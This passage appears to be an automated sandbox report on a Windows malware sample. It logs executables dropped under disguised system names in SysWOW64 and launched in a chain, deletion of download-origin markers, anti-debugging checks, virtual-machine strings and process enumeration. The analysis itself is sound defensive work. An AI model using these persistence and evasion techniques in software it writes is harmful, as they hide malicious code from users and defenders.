                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405FB0 push ecx; mov dword ptr [esp], 0000460Eh
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB7ABE push ecx; mov dword ptr [esp], 0000E2ADh
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB7A3E push ecx; mov dword ptr [esp], 00007473h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB7A0E push ecx; mov dword ptr [esp], 00008D73h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EBFE04 push C9686868h; iretd
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB7B4E push ecx; mov dword ptr [esp], 0000460Eh
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB7B0E push ecx; mov dword ptr [esp], 000084ADh
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB78CE push ecx; mov dword ptr [esp], 00002C7Ch
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB789E push ecx; mov dword ptr [esp], 000021B4h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EC51F0 push eax; ret
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EC89CA push ecx; retf
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EC8DC6 push ecx; retf
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB79DE push ecx; mov dword ptr [esp], 0000AEA2h

                      Persistence and Installation Behavior:

                      barindex
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exeExecutable created and started: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exeExecutable created and started: C:\Windows\SysWOW64\ndfapi\msrd2x40.exe
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeExecutable created and started: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exeExecutable created and started: C:\Windows\SysWOW64\d3dramp\mprdim.exe
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeExecutable created and started: C:\Windows\SysWOW64\glu32\usp10.exe
                      Source: C:\Windows\SysWOW64\glu32\usp10.exeExecutable created and started: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeExecutable created and started: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exeExecutable created and started: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exeExecutable created and started: C:\Windows\SysWOW64\ftp\wmvdspa.exe
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeExecutable created and started: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exeExecutable created and started: C:\Windows\SysWOW64\Chakrathunk\jscript9.exe
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeExecutable created and started: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exeExecutable created and started: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeFile created: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeFile created: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeFile opened: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeFile opened: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeFile opened: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeFile opened: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeFile opened: C:\Windows\SysWOW64\glu32\usp10.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\glu32\usp10.exeFile opened: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exeFile opened: C:\Windows\SysWOW64\ndfapi\msrd2x40.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exeFile opened: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exeFile opened: C:\Windows\SysWOW64\Chakrathunk\jscript9.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exeFile opened: C:\Windows\SysWOW64\ftp\wmvdspa.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exeFile opened: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exeFile opened: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exeFile opened: C:\Windows\SysWOW64\d3dramp\mprdim.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00407731 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00403DC5 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00407731 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00403DC5 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A464B7 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\glu32\usp10.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\glu32\usp10.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A41F00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,FindCloseChangeNotification,OpenProcess,QueryFullProcessImageNameW,CloseHandle,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
                      Source: C:\Windows\System32\svchost.exe TID: 6908Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6532Thread sleep time: -210000s >= -30000s
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe TID: 4920Thread sleep time: -480000s >= -30000s
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe TID: 4920Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe TID: 6236Thread sleep time: -300000s >= -30000s
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe TID: 6236Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe TID: 5200Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe TID: 5200Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe TID: 5236Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe TID: 5236Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\glu32\usp10.exe TID: 5292Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\glu32\usp10.exe TID: 5292Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe TID: 1592Thread sleep time: -240000s >= -30000s
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe TID: 1592Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exe TID: 6772Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exe TID: 6772Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe TID: 6028Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe TID: 6028Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exe TID: 4644Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exe TID: 4644Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exe TID: 6988Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exe TID: 6988Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe TID: 7008Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe TID: 7008Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe TID: 4172Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe TID: 4172Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\d3dramp\mprdim.exe TID: 1288Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\glu32\usp10.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_021E28D9 FindFirstFileW,FindNextFileW,FindClose,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_021D28D9 FindFirstFileW,FindNextFileW,FindClose,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A58C57 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_00403A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
                      Source: svchost.exe, 0000000C.00000002.304416598.000001EB50F40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.350400562.0000022998540000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.374572443.0000020319060000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.414645606.000002847DE00000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: svchost.exe, 00000014.00000002.413010176.000002847CE88000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWP
                      Source: KBDHEB.exe, 00000002.00000002.410810736.0000000002980000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.413279016.000002847CEEA000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000C.00000002.304416598.000001EB50F40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.350400562.0000022998540000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.374572443.0000020319060000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.414645606.000002847DE00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: svchost.exe, 0000000C.00000002.304416598.000001EB50F40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.350400562.0000022998540000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.374572443.0000020319060000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.414645606.000002847DE00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: svchost.exe, 0000000C.00000002.304416598.000001EB50F40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.350400562.0000022998540000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.374572443.0000020319060000.00000002.00000001.sdmp, svchost.exe, 00000014.00000002.414645606.000002847DE00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00412013 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A41F00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,FindCloseChangeNotification,OpenProcess,QueryFullProcessImageNameW,CloseHandle,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0041CCF2 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_021E378C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_021E2E8C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_02184ACB mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_021841CB mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_02180467 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_021D378C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_021D2E8C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A4EF44 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00404E10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00403F70 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB5B0E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB0456 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB69AE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB095E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02F11030 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_00403F70 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_00404E10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02B65B0E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02B60456 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02B669AE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02B6095E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02BC1030 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_00403F70 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_00404E10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02C75B0E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02C70456 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02C769AE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02C7095E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02CD1030 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_00403F70 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_00404E10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_0135095E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_013569AE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_01350456 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_01355B0E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_030A1030 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00412749 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00412013 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00416262 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
